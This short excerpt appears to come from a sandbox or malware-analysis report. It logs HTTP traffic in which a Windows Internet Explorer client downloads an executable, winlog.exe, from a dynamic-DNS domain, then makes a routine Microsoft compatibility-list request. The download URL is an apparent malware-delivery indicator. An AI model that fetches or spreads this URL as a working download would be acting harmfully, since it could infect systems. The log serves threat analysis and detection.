Network Analysis

GET /documenst/winlog.exe HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: nbnbtwowsdydebateqgh.dns.army Connection: Keep-Alive

HTTP/1.1 200 OK Date: Thu, 06 May 2021 07:31:29 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Last-Modified: Wed, 05 May 2021 22:49:57 GMT ETag: "2561d-5c19d0398712e" Accept-Ranges: bytes Content-Length: 153117 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

GET /IE9CompatViewList.xml HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Host: ie9cvlist.ie.microsoft.com If-Modified-Since: Thu, 21 Nov 2019 19:37:08 GMT If-None-Match: 0x8D76EBA32AF0BC3 Connection: Keep-Alive

HTTP/1.1 200 OK Content-Encoding: gzip Age: 1358 Cache-Control: max-age=21600 Content-MD5: Ho7x5OFxPmXuon/IucKh7g== Content-Type: text/xml Date: Thu, 06 May 2021 07:32:24 GMT Etag: 0x8D90364ECB23BC5 Last-Modified: Mon, 19 Apr 2021 18:57:05 GMT Server: ECAcc (tka/897A) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 273d7c42-001e-0008-1046-42f671000000 x-ms-version: 2009-09-19 Content-Length: 13706